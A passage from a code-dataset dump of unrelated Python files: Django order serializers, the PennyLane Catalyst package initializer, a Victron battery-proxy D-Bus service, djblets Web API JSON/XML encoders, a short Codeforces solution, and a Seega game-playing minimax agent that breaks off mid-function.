)\n\nclass OrderItemsSerializer(serializers.ModelSerializer):\n item_obj = serializers.SerializerMethodField()\n final_price = serializers.SerializerMethodField()\n item = StringSerializer()\n class Meta:\n model = OrderItems\n fields = (\n 'id',\n 'item',\n 'item_obj',\n 'ordered',\n 'final_price',\n 'quantity'\n )\n def get_item_obj(self,obj):\n return ItemSerializer(obj.item).data\n def get_final_price(self,obj):\n return obj.get_final_price()\n\nclass OrderSerializer(serializers.ModelSerializer):\n orderItems = serializers.SerializerMethodField()\n total = serializers.SerializerMethodField()\n \n class Meta:\n model = Order\n fields = (\n 'id',\n 'items',\n 'total',\n 'orderItems'\n )\n def get_orderItems(self,obj):\n return OrderItemsSerializer(obj.items.all(),many=True).data\n def get_total(self,obj):\n return obj.get_total()","repo_name":"manulangat1/django_pos_system_docker_jenkins","sub_path":"backend/pos/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42407127049","text":"import sys\nimport types\n\nimport jaxlib as _jaxlib\n\n_jaxlib_version = \"0.4.14\"\nif _jaxlib.__version__ != _jaxlib_version:\n import warnings\n\n warnings.warn(\n \"Catalyst detected a version mismatch for the installed 'jaxlib' package. Please make sure \"\n \"to install the exact version required by Catalyst to avoid undefined behaviour.\\n\"\n f\"Expected: {_jaxlib_version} Found: {_jaxlib.__version__}\",\n )\n\n\nfrom catalyst._configuration import INSTALLED\nfrom catalyst._version import __version__\n\nif not INSTALLED:\n import os\n\n default_bindings_path = os.path.join(\n os.path.dirname(__file__), \"../../mlir/build/python_packages/quantum\"\n )\n if os.path.exists(default_bindings_path): # pragma: no cover\n sys.path.insert(0, default_bindings_path)\n\n# Patch certain modules to integrate our MLIR bindings with JAX. This needs to happen before any\n# part of 'mlir_quantum' is imported.\n# Note that '__import__' does not return the specific submodule, only the parent package.\n# pylint: disable=protected-access\nsys.modules[\"mlir_quantum.ir\"] = __import__(\"jaxlib.mlir.ir\").mlir.ir\nsys.modules[\"mlir_quantum._mlir_libs\"] = __import__(\"jaxlib.mlir._mlir_libs\").mlir._mlir_libs\n# C++ extensions to the dialects are mocked out.\nsys.modules[\"mlir_quantum._mlir_libs._quantumDialects.gradient\"] = types.ModuleType(\n \"mlir_quantum._mlir_libs._quantumDialects.gradient\"\n)\nsys.modules[\"mlir_quantum._mlir_libs._quantumDialects.quantum\"] = types.ModuleType(\n \"mlir_quantum._mlir_libs._quantumDialects.quantum\"\n)\n\n\nfrom catalyst.ag_utils import AutoGraphError, autograph_source\nfrom catalyst.compilation_pipelines import QJIT, CompileOptions, qjit\nfrom catalyst.pennylane_extensions import (\n adjoint,\n cond,\n ctrl,\n for_loop,\n grad,\n jacobian,\n jvp,\n measure,\n vjp,\n while_loop,\n)\nfrom catalyst.utils.exceptions import CompileError\n\nautograph_ignore_fallbacks = False\n\"\"\"bool: Specify whether AutoGraph should avoid raising\nwarnings when conversion fails and control flow instead falls back\nto being interpreted by Python at compile-time.\n\n**Example**\n\nIn certain cases, AutoGraph will fail to convert control flow (for example,\nwhen an object that can not be converted to a JAX array is indexed in a\nloop), and will raise a warning informing of the failure.\n\n>>> @qjit(autograph=True)\n... @qml.qnode(dev)\n... def f():\n... x = [\"0.1\", \"0.2\", \"0.3\"]\n... for i in range(3):\n... qml.RX(float(x[i]), wires=i)\n... return qml.expval(qml.PauliZ(0))\nWarning: Tracing of an AutoGraph converted for loop failed with an exception:\n...\nIf you intended for the conversion to happen, make sure that the (now dynamic)\nloop variable is not used in tracing-incompatible ways, for instance by indexing a\nPython list with it. In that case, the list should be wrapped into an array.\n\nSetting this variable to ``True`` will suppress warning messages:\n\n>>> catalyst.autograph_strict_conversion = False\n>>> catalyst.autograph_ignore_fallbacks = True\n>>> @qjit(autograph=True)\n... @qml.qnode(dev)\n... def f():\n... x = [\"0.1\", \"0.2\", \"0.3\"]\n... for i in range(3):\n... qml.RX(float(x[i]), wires=i)\n... return qml.expval(qml.PauliZ(0))\n>>> f()\narray(0.99500417)\n\"\"\"\n\nautograph_strict_conversion = False\n\"\"\"bool: Specify whether AutoGraph should raise exceptions\nwhen conversion fails, rather than falling back to interpreting\ncontrol flow by Python at compile-time.\n\n**Example**\n\nIn certain cases, AutoGraph will fail to convert control flow (for example,\nwhen an object that cannot be converted to a JAX array is indexed in a\nloop), and will automatically fallback to interpreting the control flow\nlogic at compile-time via Python:\n\n>>> dev = qml.device(\"lightning.qubit\", wires=1)\n>>> @qjit(autograph=True)\n... @qml.qnode(dev)\n... def f():\n... params = [\"0\", \"1\", \"2\"]\n... for x in params:\n... qml.RY(int(x) * jnp.pi / 4, wires=0)\n... return qml.expval(qml.PauliZ(0))\n>>> f()\narray(-0.70710678)\n\nSetting this variable to ``True`` will cause AutoGraph\nto error rather than fallback when conversion fails:\n\n>>> catalyst.autograph_strict_conversion = True\n>>> @qjit(autograph=True)\n... @qml.qnode(dev)\n... def f():\n... params = [\"0\", \"1\", \"2\"]\n... for x in params:\n... qml.RY(int(x) * jnp.pi / 4, wires=0)\n... return qml.expval(qml.PauliZ(0))\nAutoGraphError: Could not convert the iteration target ['0', '1', '2'] to array\nwhile processing the following with AutoGraph:\n File \"\", line 7, in f\n for x in params:\n\"\"\"\n\n\n__all__ = (\n \"qjit\",\n \"QJIT\",\n \"for_loop\",\n \"while_loop\",\n \"cond\",\n \"ctrl\",\n \"measure\",\n \"grad\",\n \"jacobian\",\n \"vjp\",\n \"jvp\",\n \"adjoint\",\n \"autograph_source\",\n \"autograph_ignore_fallbacks\",\n \"autograph_strict_conversion\",\n \"AutoGraphError\",\n \"CompileError\",\n \"CompileOptions\",\n)\n","repo_name":"PennyLaneAI/catalyst","sub_path":"frontend/catalyst/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"34"} +{"seq_id":"36294134334","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nfrom script_utils import SCRIPT_HOME, VERSION\nsys.path.insert(1, os.path.join(os.path.dirname(__file__), f\"{SCRIPT_HOME}/ext\"))\n\nimport dbus\nfrom dbus.mainloop.glib import DBusGMainLoop\nfrom gi.repository import GLib\nimport logging\nfrom vedbus import VeDbusService\nfrom dbusmonitor import DbusMonitor\nfrom collections import namedtuple\nimport time\nfrom pathlib import Path\nimport json\n\nDEPTH_OF_DISCHARGE = 50\n\nSTANDARD_TEMPERATURE = 25\nTEMPERATURE_COMPENSATION = -16/1000\n\nDEFAULT_MAX_VOLTAGE = 14.8\nDEFAULT_FULL_VOLTAGE = 12.8\nDEFAULT_MIN_VOLTAGE = 12.2\nDEFAULT_EMPTY_VOLTAGE = 11.8\n\nVOLTAGE_DEADBAND = 1.0\n\nMAX_DATA_HISTORY = 9\n\nDEVICE_INSTANCE_ID = 1025\nPRODUCT_ID = 0\nPRODUCT_NAME = \"Battery Proxy\"\nFIRMWARE_VERSION = 0\nHARDWARE_VERSION = 0\nCONNECTED = 1\n\nBATTERY_TEMPERATURE_SENSOR = 0\n\nFLOAT_STATE = 5\n\nFOREVER = 864000\n\nALARM_OK = 0\nALARM_WARNING = 1\nALARM_ALARM = 2\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(\"battery\")\n\n\nclass SystemBus(dbus.bus.BusConnection):\n def __new__(cls):\n return dbus.bus.BusConnection.__new__(cls, dbus.bus.BusConnection.TYPE_SYSTEM)\n\n\nclass SessionBus(dbus.bus.BusConnection):\n def __new__(cls):\n return dbus.bus.BusConnection.__new__(cls, dbus.bus.BusConnection.TYPE_SESSION)\n\n\ndef dbusConnection():\n return SessionBus() if 'DBUS_SESSION_BUS_ADDRESS' in os.environ else SystemBus()\n\n\nService = namedtuple('Service', ['name', 'type'])\nPowerSample = namedtuple('PowerSample', ['power', 'timestamp'])\nDataSample = namedtuple('DataSample', ['current', 'voltage', 'timestamp', 'temperature'])\n\n\ndef _safe_min(newValue, currentValue):\n return min(newValue, currentValue) if currentValue is not None else newValue\n\n\ndef _safe_max(newValue, currentValue):\n return max(newValue, currentValue) if currentValue is not None else newValue\n\n\ndef toKWh(joules):\n return joules/3600/1000\n\n\ndef toAh(joules, voltage):\n return joules/voltage/3600\n\n\nVOLTAGE_TEXT = lambda path,value: \"{:.2f}V\".format(value)\nCURRENT_TEXT = lambda path,value: \"{:.3f}A\".format(value)\nPOWER_TEXT = lambda path,value: \"{:.2f}W\".format(value)\nENERGY_TEXT = lambda path,value: \"{:.6f}kWh\".format(value)\nAH_TEXT = lambda path,value: \"{:.3f}Ah\".format(value)\nSOC_TEXT = lambda path,value: \"{:.0f}%\".format(value)\n\n\ndef compensated_voltage(voltage, temperature):\n return voltage - (temperature - STANDARD_TEMPERATURE) * TEMPERATURE_COMPENSATION\n\n\nclass BatteryService:\n def __init__(self, conn, config):\n self.config = config\n self.emptyVoltage = config.get(\"emptyVoltage\", DEFAULT_EMPTY_VOLTAGE)\n self.minVoltage = config.get(\"minVoltage\", DEFAULT_MIN_VOLTAGE)\n self.fullVoltage = config.get(\"fullVoltage\", DEFAULT_FULL_VOLTAGE)\n self.maxVoltage = config.get(\"maxVoltage\", DEFAULT_MAX_VOLTAGE)\n self.service = VeDbusService('com.victronenergy.battery.proxy', conn)\n self.service.add_mandatory_paths(__file__, VERSION, 'dbus', DEVICE_INSTANCE_ID,\n PRODUCT_ID, PRODUCT_NAME, FIRMWARE_VERSION, HARDWARE_VERSION, CONNECTED)\n self.service.add_path(\"/Dc/0/Voltage\", 0, gettextcallback=VOLTAGE_TEXT)\n self.service.add_path(\"/Dc/0/Current\", 0, gettextcallback=CURRENT_TEXT)\n self.service.add_path(\"/Dc/0/Power\", 0, gettextcallback=POWER_TEXT)\n self.service.add_path(\"/Soc\", None, gettextcallback=SOC_TEXT)\n self.service.add_path(\"/TimeToGo\", FOREVER)\n self.service.add_path(\"/History/MinimumVoltage\", None, gettextcallback=VOLTAGE_TEXT)\n self.service.add_path(\"/History/MaximumVoltage\", None, gettextcallback=VOLTAGE_TEXT)\n self.service.add_path(\"/History/ChargedEnergy\", 0, gettextcallback=ENERGY_TEXT)\n self.service.add_path(\"/History/DischargedEnergy\", 0, gettextcallback=ENERGY_TEXT)\n self.service.add_path(\"/History/TotalAhDrawn\", 0, gettextcallback=AH_TEXT)\n self.service.add_path(\"/History/DeepestDischarge\", None, gettextcallback=SOC_TEXT)\n self.service.add_path(\"/History/FullDischarges\", 0)\n self.service.add_path(\"/Alarms/LowVoltage\", ALARM_OK)\n self.service.add_path(\"/Alarms/HighVoltage\", ALARM_OK)\n self.service.add_path(\"/Alarms/LowSoc\", ALARM_OK)\n self.service.add_path(\"/Capacity\", self.config['capacity'], gettextcallback=AH_TEXT)\n self.service.add_path(\"/InstalledCapacity\", self.config['capacity'], gettextcallback=AH_TEXT)\n self._local_values = {}\n for path in self.service._dbusobjects:\n self._local_values[path] = self.service[path]\n options = None # currently not used afaik\n self.monitor = DbusMonitor({\n 'com.victronenergy.solarcharger': {\n '/Dc/0/Current': options,\n '/Dc/0/Voltage': options,\n '/State': options,\n '/Dc/0/Power': options\n },\n 'com.victronenergy.dcload': {\n '/Dc/0/Current': options,\n '/Dc/0/Voltage': options,\n '/Dc/0/Power': options\n },\n 'com.victronenergy.dcsource': {\n '/Dc/0/Current': options,\n '/Dc/0/Voltage': options,\n '/Dc/0/Power': options\n },\n 'com.victronenergy.temperature': {\n '/Temperature': options,\n '/TemperatureType': options\n }\n })\n self.lastPower = None\n self.dataHistory = []\n\n def _get_value(self, serviceName, path, defaultValue=None):\n return self.monitor.get_value(serviceName, path, defaultValue)\n\n def update(self):\n bestLoadVoltage = None\n bestSourceVoltage = None\n totalCurrent = 0\n totalPower = 0\n chargingState = None\n\n services = []\n for serviceType in ['solarcharger', 'dcload', 'dcsource']:\n for serviceName in self.monitor.get_service_list('com.victronenergy.' + serviceType):\n services.append(Service(serviceName, serviceType))\n\n for service in services:\n serviceName = service.name\n current = self._get_value(serviceName, \"/Dc/0/Current\", 0)\n voltage = self._get_value(serviceName, \"/Dc/0/Voltage\", 0)\n power = self._get_value(serviceName, \"/Dc/0/Power\", voltage * current)\n if service.type == 'dcload':\n current = -current\n power = -power\n # highest should be most accurate as closest to battery (upstream cable losses)\n if voltage > VOLTAGE_DEADBAND:\n bestLoadVoltage = _safe_max(voltage, bestLoadVoltage)\n else:\n # lowest should be most accurate as closest to battery (downstream cable losses)\n if voltage > VOLTAGE_DEADBAND:\n bestSourceVoltage = _safe_min(voltage, bestSourceVoltage)\n totalCurrent += current\n totalPower += power\n\n if service.type == 'solarcharger':\n chargingState = self._get_value(serviceName, \"/State\")\n\n temperature = STANDARD_TEMPERATURE\n for serviceName in self.monitor.get_service_list('com.victronenergy.temperature'):\n if self._get_value(serviceName, \"/TemperatureType\") == BATTERY_TEMPERATURE_SENSOR:\n temperature = self._get_value(serviceName, \"/Temperature\", STANDARD_TEMPERATURE)\n break\n\n self._local_values[\"/Dc/0/Current\"] = totalCurrent\n batteryVoltage = None\n if bestLoadVoltage and bestSourceVoltage:\n batteryVoltage = (bestLoadVoltage + bestSourceVoltage)/2\n elif bestLoadVoltage:\n batteryVoltage = bestLoadVoltage\n elif bestSourceVoltage:\n batteryVoltage = bestSourceVoltage\n if batteryVoltage:\n self._local_values[\"/Dc/0/Voltage\"] = round(batteryVoltage, 3)\n\n now = time.perf_counter()\n self._local_values[\"/Dc/0/Power\"] = totalPower\n remainingAh = self._local_values[\"/Capacity\"]\n if self.lastPower is not None:\n # trapezium integration\n energy = (self.lastPower.power + totalPower)/2 * (now - self.lastPower.timestamp)\n if energy > 0:\n chargedEnergy = energy\n self._local_values[\"/History/ChargedEnergy\"] += toKWh(chargedEnergy)\n chargedAh = toAh(chargedEnergy, batteryVoltage)\n remainingAh = min(remainingAh + chargedAh, self.config['capacity'])\n elif energy < 0:\n dischargedEnergy = -energy\n self._local_values[\"/History/DischargedEnergy\"] += toKWh(dischargedEnergy)\n dischargedAh = toAh(dischargedEnergy, batteryVoltage)\n self._local_values[\"/History/TotalAhDrawn\"] += dischargedAh\n remainingAh = max(remainingAh - dischargedAh, 0)\n self.lastPower = PowerSample(totalPower, now)\n\n if chargingState == FLOAT_STATE:\n remainingAh = self.config['capacity']\n self._local_values[\"/Capacity\"] = remainingAh\n\n self.dataHistory.append(DataSample(totalCurrent, batteryVoltage, now, temperature))\n dataHistoryLen = len(self.dataHistory)\n if dataHistoryLen > MAX_DATA_HISTORY:\n del self.dataHistory[:dataHistoryLen-MAX_DATA_HISTORY]\n\n # median current filter\n filteredCurrentSample = sorted(self.dataHistory, key=lambda sample: sample.current)[dataHistoryLen//2]\n filteredCurrent = filteredCurrentSample.current\n # use a filtered value to remove any transients\n if filteredCurrent < 0:\n dischargeCurrent = -filteredCurrent\n self._local_values[\"/TimeToGo\"] = max(round((remainingAh - DEPTH_OF_DISCHARGE/100 * self.config['capacity'])/dischargeCurrent * 3600, 0), 0)\n else:\n self._local_values[\"/TimeToGo\"] = FOREVER\n\n soc = self.soc_from_voltage(compensated_voltage(batteryVoltage, temperature))\n self._local_values[\"/Soc\"] = soc\n if soc < 10:\n self._local_values[\"/Alarms/LowSoc\"] = ALARM_ALARM\n else:\n self._local_values[\"/Alarms/LowSoc\"] = ALARM_OK\n self._local_values[\"/History/MinimumVoltage\"] = _safe_min(batteryVoltage, self._local_values[\"/History/MinimumVoltage\"])\n self._local_values[\"/History/MaximumVoltage\"] = _safe_max(batteryVoltage, self._local_values[\"/History/MaximumVoltage\"])\n deepestDischarge = self._local_values[\"/History/DeepestDischarge\"]\n if deepestDischarge is None or soc < deepestDischarge:\n self._local_values[\"/History/DeepestDischarge\"] = soc\n if batteryVoltage <= self.emptyVoltage:\n self._local_values[\"/History/FullDischarges\"] += 1\n\n # median voltage filter\n filteredVoltageSample = sorted(self.dataHistory, key=lambda sample: sample.voltage)[dataHistoryLen//2]\n filteredCompensatedVoltage = compensated_voltage(filteredVoltageSample.voltage, filteredVoltageSample.temperature)\n # use a filtered value for alarm checking to remove any transients\n if filteredCompensatedVoltage <= self.minVoltage:\n self._local_values[\"/Alarms/LowVoltage\"] = ALARM_ALARM\n else:\n self._local_values[\"/Alarms/LowVoltage\"] = ALARM_OK\n if filteredCompensatedVoltage >= self.maxVoltage:\n self._local_values[\"/Alarms/HighVoltage\"] = ALARM_ALARM\n else:\n self._local_values[\"/Alarms/HighVoltage\"] = ALARM_OK\n return True\n\n def publish(self):\n for k,v in self._local_values.items():\n self.service[k] = v\n return True\n\n def soc_from_voltage(self, voltage):\n # very approximate!!!\n return min(max(100 * (voltage - self.emptyVoltage)/(self.fullVoltage - self.emptyVoltage), 0), 100)\n\n def __str__(self):\n return PRODUCT_NAME\n\n\ndef main():\n DBusGMainLoop(set_as_default=True)\n setupOptions = Path(\"/data/setupOptions/BatteryProxy\")\n configFile = setupOptions/\"config.json\"\n with configFile.open() as f:\n config = json.load(f)\n battery = BatteryService(dbusConnection(), config)\n GLib.timeout_add(200, battery.update)\n GLib.timeout_add_seconds(1, battery.publish)\n logger.info(\"Registered Battery Proxy\")\n mainloop = GLib.MainLoop()\n mainloop.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pulquero/BatteryProxy","sub_path":"battery_service.py","file_name":"battery_service.py","file_ext":"py","file_size_in_byte":12604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16797705752","text":"import io\nimport json\nfrom xml.sax.saxutils import XMLGenerator\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User, Group\nfrom django.db.models.query import QuerySet\n\nfrom djblets.util.serializers import DjbletsJSONEncoder\n\n\nclass WebAPIEncoder(object):\n \"\"\"Encodes an object into a dictionary of fields and values.\n\n This object is used for both JSON and XML API formats.\n\n Projects can subclass this to provide representations of their objects.\n To make use of a encoder, add the path to the encoder class to\n the project's ``settings.WEB_API_ENCODERS`` list.\n\n For example:\n\n .. code-block:: python\n\n WEB_API_ENCODERS = (\n 'myproject.webapi.MyEncoder',\n )\n \"\"\"\n\n def encode(self, o, *args, **kwargs):\n \"\"\"Encodes an object.\n\n This is expected to return either a dictionary or a list. If the\n object being encoded is not supported, return None, or call\n the superclass's encode method.\n \"\"\"\n return None\n\n\nclass BasicAPIEncoder(WebAPIEncoder):\n \"\"\"A basic encoder that encodes standard types.\n\n This supports encoding of dates, times, QuerySets, Users, and Groups.\n \"\"\"\n def encode(self, o, *args, **kwargs):\n if isinstance(o, QuerySet):\n return list(o)\n elif isinstance(o, User):\n return {\n 'id': o.id,\n 'username': o.username,\n 'first_name': o.first_name,\n 'last_name': o.last_name,\n 'fullname': o.get_full_name(),\n 'email': o.email,\n 'url': o.get_absolute_url(),\n }\n elif isinstance(o, Group):\n return {\n 'id': o.id,\n 'name': o.name,\n }\n else:\n try:\n return DjbletsJSONEncoder().default(o)\n except TypeError:\n return None\n\n\nclass ResourceAPIEncoder(WebAPIEncoder):\n \"\"\"An encoder that encodes objects based on registered resources.\"\"\"\n def encode(self, o, *args, **kwargs):\n if isinstance(o, QuerySet):\n return list(o)\n else:\n calling_resource = kwargs.pop('calling_resource', None)\n\n if calling_resource:\n serializer = calling_resource.get_serializer_for_object(o)\n else:\n from djblets.webapi.resources import get_resource_for_object\n\n serializer = get_resource_for_object(o)\n\n if serializer:\n return serializer.serialize_object(o, *args, **kwargs)\n else:\n try:\n return DjbletsJSONEncoder().default(o)\n except TypeError:\n return None\n\n\nclass JSONEncoderAdapter(json.JSONEncoder):\n \"\"\"Adapts a WebAPIEncoder to be used with json.\n\n This takes an existing encoder and makes it available to use as a\n json.JSONEncoder. This is used internally when generating JSON from a\n WebAPIEncoder, but can be used in other projects for more specific\n purposes as well.\n \"\"\"\n def __init__(self, encoder, *args, **kwargs):\n super(JSONEncoderAdapter, self).__init__(\n sort_keys=kwargs.pop('sort_keys', True),\n *args, **kwargs)\n self.encoder = encoder\n\n def encode(self, o, *args, **kwargs):\n self.encode_args = args\n self.encode_kwargs = kwargs\n return super(JSONEncoderAdapter, self).encode(o)\n\n def default(self, o):\n \"\"\"Encodes an object using the supplied WebAPIEncoder.\n\n If the encoder is unable to encode this object, a TypeError is raised.\n \"\"\"\n result = self.encoder.encode(o, *self.encode_args,\n **self.encode_kwargs)\n\n if result is None:\n raise TypeError(\"%r is not JSON serializable\" % (o,))\n\n return result\n\n\nclass XMLEncoderAdapter(object):\n \"\"\"Adapts a WebAPIEncoder to output XML.\n\n This takes an existing encoder and adapts it to output a simple XML format.\n \"\"\"\n def __init__(self, encoder, *args, **kwargs):\n self.encoder = encoder\n\n def encode(self, o, *args, **kwargs):\n self.level = 0\n self.doIndent = False\n\n stream = io.StringIO()\n self.xml = XMLGenerator(stream, settings.DEFAULT_CHARSET)\n self.xml.startDocument()\n self.startElement(\"rsp\")\n self.__encode(o, *args, **kwargs)\n self.endElement(\"rsp\")\n self.xml.endDocument()\n self.xml = None\n\n return stream.getvalue()\n\n def __encode(self, o, *args, **kwargs):\n if isinstance(o, dict):\n for key, value in o.items():\n attrs = {}\n\n if isinstance(key, int):\n attrs['value'] = str(key)\n key = 'int'\n\n self.startElement(key, attrs)\n self.__encode(value, *args, **kwargs)\n self.endElement(key)\n elif isinstance(o, (tuple, list)):\n self.startElement(\"array\")\n\n for i in o:\n self.startElement(\"item\")\n self.__encode(i, *args, **kwargs)\n self.endElement(\"item\")\n\n self.endElement(\"array\")\n elif isinstance(o, str):\n self.text(o)\n elif isinstance(o, int):\n self.text(\"%d\" % o)\n elif isinstance(o, float):\n self.text(\"%s\" % o)\n elif isinstance(o, bool):\n if o:\n self.text(\"True\")\n else:\n self.text(\"False\")\n elif o is None:\n pass\n else:\n result = self.encoder.encode(o, *args, **kwargs)\n\n if result is None:\n raise TypeError(\"%r is not XML serializable\" % (o,))\n\n return self.__encode(result, *args, **kwargs)\n\n def startElement(self, name, attrs={}):\n self.addIndent()\n self.xml.startElement(name, attrs)\n self.level += 1\n self.doIndent = True\n\n def endElement(self, name):\n self.level -= 1\n self.addIndent()\n self.xml.endElement(name)\n self.doIndent = True\n\n def text(self, value):\n self.xml.characters(value)\n self.doIndent = False\n\n def addIndent(self):\n if self.doIndent:\n self.xml.ignorableWhitespace('\\n' + ' ' * self.level)\n\n\n_registered_encoders = None\n\n\ndef get_registered_encoders():\n \"\"\"\n Returns a list of registered Web API encoders.\n \"\"\"\n global _registered_encoders\n\n if _registered_encoders is None:\n _registered_encoders = []\n\n encoders = getattr(settings, 'WEB_API_ENCODERS',\n ['djblets.webapi.encoders.BasicAPIEncoder'])\n\n for encoder in encoders:\n encoder_path = encoder.split('.')\n if len(encoder_path) > 1:\n encoder_module_name = '.'.join(encoder_path[:-1])\n else:\n encoder_module_name = '.'\n\n encoder_module = __import__(encoder_module_name, {}, {},\n encoder_path[-1])\n encoder_class = getattr(encoder_module, encoder_path[-1])\n _registered_encoders.append(encoder_class())\n\n return _registered_encoders\n","repo_name":"djblets/djblets","sub_path":"djblets/webapi/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":7274,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"34"} +{"seq_id":"15483934001","text":"num1 = int(input())\nfor i in range(num1):\n num2 = int(input())\n list1 = list(map(int, input().split()))\n list2 = list(set(list1))\n a = 0\n b = 0\n for i in range(num2):\n if list2[0]==list1[i]:\n a+=1\n if(a>1):\n print(list1.index(list2[1])+1)\n else:\n print(list1.index(list2[0])+1)\n","repo_name":"Neloy-SWE/Solving","sub_path":"codeforces/1512A Spy Detected!.py","file_name":"1512A Spy Detected!.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"38155076462","text":"from core.player import Player, Color\r\nfrom seega.seega_rules import SeegaRules\r\nfrom copy import deepcopy\r\nfrom seega import SeegaAction\r\nimport random\r\nimport time\r\nimport numpy as np\r\n\r\n######################\r\n# Auxiliars Functions\r\n######################\r\ndef calculate_time(remain_time):\r\n return min(np.exp(0.03*remain_time)-1, 20)\r\n\r\n\"\"\"\r\nReturn number of opponent' possible captures\r\nfor given state\r\n\"\"\"\r\ndef list_piece_connections(piece, all_pieces, piece_list):\r\n\r\n for next_piece in all_pieces:\r\n if next_piece not in piece_list:\r\n # check if they are in same row or column\r\n if (next_piece[0]==piece[0] or next_piece[1]==piece[1]):\r\n # check if they are close\r\n if abs(next_piece[0] + next_piece[1] - piece[0] - piece[1])==1:\r\n piece_list.append(next_piece)\r\n list_piece_connections(next_piece, all_pieces, piece_list)\r\n\r\n\r\n###########\r\n# AI Class\r\n###########\r\n\r\nclass AI(Player):\r\n\r\n in_hand = 12\r\n score = 0\r\n name = \"smart_agent\"\r\n\r\n def __init__(self, color):\r\n super(AI, self).__init__(color)\r\n self.position = color.value\r\n self.depth = 0\r\n\r\n\r\n \"\"\"\r\n How our agent will play at each new state and remaining\r\n time.\r\n \"\"\"\r\n def play(self, state, remain_time):\r\n # print(\"\")\r\n # print(f\"Player {self.position} is playing.\")\r\n # print(\"time remain is \", remain_time, \" seconds\")\r\n\r\n self.state_dict = {}\r\n self.remaining_time = calculate_time(remain_time)\r\n self.start_time = time.time()\r\n\r\n if len(self.successors(state))==1:\r\n return self.successors(state)[0][0]\r\n\r\n if state.phase == 1: # add\r\n return minimax_search(state, self)\r\n else:\r\n self.depth = 2\r\n time_lapse = 0\r\n\r\n turn_remaining_time = self.remaining_time - (time.time() - self.start_time)\r\n\r\n while time_lapse < turn_remaining_time and self.depth < 10:\r\n start_iteration = time.time()\r\n new_action = minimax_search(state, self)\r\n if new_action != None:\r\n action = new_action\r\n end_iteration = time.time()\r\n time_lapse = end_iteration - start_iteration\r\n self.depth += 1\r\n self.state_dict = {}\r\n turn_remaining_time = self.remaining_time - (time.time()- self.start_time)\r\n\r\n # print(self.depth, turn_remaining_time, self.remaining_time)\r\n\r\n return action\r\n\r\n\r\n \"\"\"\r\n The successors function must return (or yield) a list of\r\n pairs (a, s) in which a is the action played to reach the\r\n state s.\r\n \"\"\"\r\n def successors(self, state):\r\n # #player = state._next_player\r\n # actions = SeegaRules.get_player_actions(state, self.color.value)\r\n # SeegaRules.act(s, a, self.color.value)\r\n\r\n next_player = state._next_player\r\n actions = SeegaRules.get_player_actions(state, next_player)\r\n successors = list()\r\n\r\n for a in actions:\r\n s = deepcopy(state)\r\n possible_states = SeegaRules.act(s, a, next_player)\r\n if possible_states:\r\n successors.append((a,possible_states[0]))\r\n\r\n if state.phase == 2:\r\n successors.sort(key=lambda t: self.evaluate(t[1]), reverse=next_player != self.position)\r\n\r\n return successors\r\n\r\n \"\"\"\r\n ** The cutoff function returns true if the alpha-beta/minimax\r\n search has to stop and false otherwise.\r\n \"\"\"\r\n def cutoff(self, state, depth):\r\n if state in self.state_dict and self.state_dict[state]==[state.score[-1], state.score[1]]: # Redundant state\r\n return True\r\n else:\r\n self.state_dict[state] = [state.score[-1], state.score[1]]\r\n\r\n if SeegaRules.is_end_game(state):\r\n return True\r\n else:\r\n if state.phase==1 and depth>0:\r\n return True\r\n if depth > self.depth:\r\n return True\r\n else:\r\n if time.time() - self.start_time > self.remaining_time:\r\n return True\r\n else:\r\n return False\r\n\r\n \"\"\"\r\n Return a value correspond to number of\r\n harmless squares\r\n \"\"\"\r\n def safety_evaluation(self, state):\r\n # get board info from state\r\n dimension = state.board.board_shape\r\n square = state.board.get_board_state()\r\n #player_color = Color(self.position)\r\n\r\n # initiate verification\r\n evaluation = 0\r\n pieces_on_board = state.board.get_player_pieces_on_board(Color(self.position))\r\n\r\n for piece in pieces_on_board:\r\n moves = [(piece[0] + a[0], piece[1] + a[1]) for a in [(0, 1), (0, -1), (1, 0), (-1, 0)]\r\n if (0 <= piece[0] + a[0] < dimension[0]) and (0 <= piece[1] + a[1] < dimension[1])]\r\n\r\n for move in moves:\r\n if square[move[0]][move[1]].value == 0 or square[move[0]][move[1]].value == self.position:\r\n evaluation += 1\r\n\r\n return evaluation\r\n\r\n\r\n \"\"\"\r\n Return a value corresponding to how defensive agent\r\n should play given a game status\r\n \"\"\"\r\n def defensive_evaluation(self, state):\r\n defensive_coef = 1/8 # how safe the agent plays\r\n if state.phase == 2:\r\n score = state.get_player_info(self.position)[\"score\"]\r\n opp_score = state.get_player_info(self.position*-1)[\"score\"]\r\n balance = score - opp_score\r\n\r\n if SeegaRules.is_end_game(state) and balance < 0:\r\n return float('-inf')\r\n elif SeegaRules.is_end_game(state) and balance > 0:\r\n return float('inf')\r\n else:\r\n return defensive_coef + defensive_coef * self.safety_evaluation(state)\r\n else:\r\n return 0\r\n\r\n \"\"\"\r\n return the number of conner & edges\r\n \"\"\"\r\n def corner_edges(self, state):\r\n dimension = state.board.board_shape\r\n corners = [(0, 0), (dimension[0], 0), (0, dimension[1]), (dimension[0], dimension[1])]\r\n corner, edges = 0, 0\r\n\r\n pieces_on_board = state.board.get_player_pieces_on_board(Color(self.position))\r\n for piece in pieces_on_board:\r\n if piece in corners:\r\n corner += 1\r\n elif piece[0] == 0 or piece[0] == dimension[0]:\r\n edges += 1\r\n elif piece[1] == 0 or piece[1] == dimension[1]:\r\n edges += 1\r\n return corner, edges\r\n\r\n \"\"\"\r\n return the max number of pieces \"connected\" for a\r\n given color\r\n \"\"\"\r\n def get_conn_pieces_num(self, state, color):\r\n\r\n all_pieces = state.board.get_player_pieces_on_board(color)\r\n connected_pieces = list()\r\n max_connections = 0\r\n\r\n for piece in all_pieces:\r\n if piece not in connected_pieces:\r\n new_connected_pieces = [piece]\r\n list_piece_connections(piece, all_pieces, 